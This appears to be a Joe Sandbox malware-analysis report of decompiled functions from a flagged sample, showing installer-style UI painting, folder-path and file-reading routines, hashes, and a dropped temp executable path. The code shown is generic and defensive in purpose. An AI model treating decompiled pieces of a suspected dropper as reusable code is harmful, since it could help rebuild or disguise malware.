Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$(Vz$(^z$(^z$[Rename]
API String ID: 2171350718-2000197835
Opcode ID: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
Instruction ID: 6cadb61bc7003589c9facc341004653e1fa6c0793f9c109ef5d6a16b2289e69d
Opcode Fuzzy Hash: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
Instruction Fuzzy Hash: 2D313571600705BBD2206B669D48F1B3A9CEF85714F16003EFD42FA2C2DA7DD82586BD

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x7a8ab0;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x7a7aa0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8aa8;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,007A7AA0,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
Instruction ID: 97a6e5849d711934decb320d9e1447055a7c39d586dd296ee09aa65e352ff849
Opcode Fuzzy Hash: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
Instruction Fuzzy Hash: 83418C71800209AFCF058F95CE459AF7BB9FF45315F00802AF991AA1A0CB389A55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 004066AB Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004066AB(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x7a7a7c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x7a8ad8 + _t44 * 2;
				_t45 = 0x7a6a40;
				_t108 = 0x7a6a40;
				if(_a4 >= 0x7a6a40 && _a4 - 0x7a6a40 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E0040666E(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066AB(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x7a6a40;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x7a9000;
								E0040666E(_t108, (_t78 << 0xb) + 0x7a9000);
							} else {
								E004065B5(_t108,  *0x7a8aa8);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068F5(_t108);
							}
							goto L38;
						}
						if( *0x7a8b24 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x7a8aa4;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E0040653C( *0x7a8ad8, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8ad8 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066AB(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}

0x004066ab
0x004066ab
0x004066ab
0x004066b1
0x004066b6
0x004066c7
0x004066c7
0x004066cf
0x004066d0
0x004066d1
0x004066d2
0x004066d5
0x004066dd
0x004066df
0x004066f0
0x004066f3
0x004066f3
0x004066f7
0x004066fd
0x00406700
0x004068db
0x004068db
0x004068e6
0x004068f2
0x004068f2
0x00000000
0x00406706
0x0040670b
0x00406720
0x00406721
0x00406727
0x004068b9
0x004068c7
0x004068ca
0x004068ca
0x004068bb
0x004068be
0x004068c1
0x004068c3
0x004068c3
0x004068cc
0x004068cc
0x004068d2
0x004068d5
0x00406708
0x00000000
0x00406708
0x00000000
0x004068d5
0x0040672d
0x00406730
0x0040673f
0x00406746
0x00406752
0x00406755
0x00406758
0x00406759
0x0040675e
0x00406764
0x00406767
0x0040676a
0x0040685d
0x00406862
0x00406895
0x0040689a
0x0040689f
0x004068a4
0x004068a4
0x004068a9
0x004068af
0x004068b2
0x00000000
0x004068b2
0x00406864
0x00406867
0x0040686a
0x0040687f
0x00406886
0x0040686c
0x00406873
0x00406873
0x0040688e
0x00406891
0x00406855
0x00406856
0x00406856
0x00000000
0x00406891
0x00406777
0x0040677b
0x0040677b
0x0040677c
0x0040677e
0x004067bb
0x004067be
0x004067ce
0x004067d1
0x004067d9
0x004067df
0x004067df
0x0040683a
0x0040683a
0x0040683c
0x00000000
0x00000000
0x004067e3
0x004067e8
0x004067e9
0x004067eb
0x00406802
0x00406810
0x00406816
0x00406818
0x00406836
0x00406836
0x00406836
0x00000000
0x00406836
0x0040681e
0x00406827
0x0040682a
0x00406830
0x00406834
0x00000000
0x00000000
0x00000000
0x00406834
0x004067fc
0x004067fe
0x00406800
0x00000000
0x00000000
0x00000000
0x00406800
0x00000000
0x0040683a
0x004067c6
0x00000000
0x00406780
0x0040679e
0x004067a7
0x00406844
0x00406848
0x00406850
0x00406850
0x00000000
0x00406848
0x004067b1
0x0040683e
0x00406842
0x00000000
0x00000000
0x00000000
0x00406842
0x0040677e
0x00000000
0x0040670b

APIs

GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,00000400), ref: 004067C6
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,00000400,00000000,007A0F68,?,00405707,007A0F68,00000000,00000000,00000000,00000000), ref: 004067D9
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,\Microsoft\Internet Explorer\Quick Launch), ref: 00406850
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040684A
C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl, xrefs: 004066D5, 00406788, 0040678F, 00406793, 004067B0, 004067C5, 004067D8, 004067ED, 0040681A, 0040684F, 00406855, 00406872, 00406885, 004068A3, 004068A9, 004068B2, 004068E8
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406794

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-3982504609
Opcode ID: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
Instruction ID: c9eaf07520507b798c7259a568fd9567d3c8f5a418c476a208567326fda18bee
Opcode Fuzzy Hash: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
Instruction Fuzzy Hash: F061FF72902115AADF10AF68CC40BAE37A5AF55314F22C03FE947B62D0DB3D49A5CB89

Uniqueness

Uniqueness Score: -1.00%

Function 00404631 Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404631(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x00404643
0x004046f9
0x00000000
0x004046f9
0x00404654
0x00404658
0x00000000
0x00404672
0x00404672
0x0040467b
0x00000000
0x00000000
0x0040467d
0x00404689
0x0040468c
0x0040468c
0x00404692
0x00404698
0x00404698
0x004046a4
0x004046aa
0x004046b1
0x004046b4
0x004046b7
0x004046b9
0x004046b9
0x004046c1
0x004046c7
0x004046c7
0x004046d1
0x004046d6
0x004046d9
0x004046de
0x004046e1
0x004046e1
0x004046f1
0x004046f1
0x00000000
0x004046f4

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040464E
GetSysColor.USER32(00000000), ref: 0040468C
SetTextColor.GDI32(?,00000000), ref: 00404698
SetBkMode.GDI32(?,?), ref: 004046A4
GetSysColor.USER32(?), ref: 004046B7
SetBkColor.GDI32(?,?), ref: 004046C7
DeleteObject.GDI32(?), ref: 004046E1
CreateBrushIndirect.GDI32(?), ref: 004046EB

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: 80d2dfdfbb5be5877469216c844a522b7394a6fa1e0a99176855ee87e7478973
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: EC2179B15007049BC730DF68D908B5BBBF8AF41714F048E2EE9D6A26E1E739D944DB68

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x7a8b28 =  *0x7a8b28 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065CE(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040623F( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061E1( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065B5( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x004026ec
0x004026ee
0x004026f1
0x004026f3
0x004026f6
0x004026fb
0x004026ff
0x00402702
0x00402705
0x00402c2a
0x00402c2d
0x0040270b
0x0040270b
0x00402712
0x00402714
0x00402714
0x0040271a
0x0040287e
0x0040287e
0x00402881
0x00402886
0x004015b6
0x0040292e
0x0040292e
0x00000000
0x00402720
0x00402721
0x0040272c
0x0040272f
0x0040273b
0x0040273f
0x004027d7
0x004027ef
0x004027ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402745
0x00402745
0x00402748
0x00402749
0x0040274c
0x00402751
0x00402758
0x00402760
0x00000000
0x00402766
0x00402766
0x0040276b
0x00000000
0x00402771
0x00402771
0x00402779
0x0040277c
0x0040277f
0x0040283a
0x00402841
0x00402785
0x0040278b
0x00402797
0x00402801
0x00402801
0x00402799
0x00402799
0x0040279c
0x0040279e
0x0040279e
0x0040279e
0x004027a1
0x004027a6
0x004027a9
0x00000000
0x00000000
0x004027ab
0x004027ae
0x004027bc
0x004027c2
0x004027d0
0x00000000
0x004027d2
0x00000000
0x004027d2
0x00000000
0x004027d0
0x0040279e
0x00402804
0x00402807
0x00000000
0x00402809
0x0040280e
0x0040284f
0x00402871
0x00402878
0x0040285d
0x0040285d
0x00402860
0x00402863
0x00402866
0x00402866
0x00000000
0x00402817
0x00402817
0x0040281a
0x0040281d
0x00402823
0x00402827
0x0040282a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040282a
0x0040280e
0x00402807
0x0040277f
0x0040276b
0x00402760
0x00000000
0x0040282c
0x0040282c
0x0040282f
0x00402838
0x00000000
0x0040272f
0x0040271a
0x00402c33
0x00402c39

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 0040623F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026D1,00000000,00000000,?,00000000,00000011), ref: 00406255

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
Instruction ID: 3e360b617c3737f2e779930334e882a7207aef4f73e2c1e076e29b282e1bb3de
Opcode Fuzzy Hash: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
Instruction Fuzzy Hash: 60510B75D00219ABDF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004056D0 Relevance: 10.6, APIs: 7, Instructions: 72
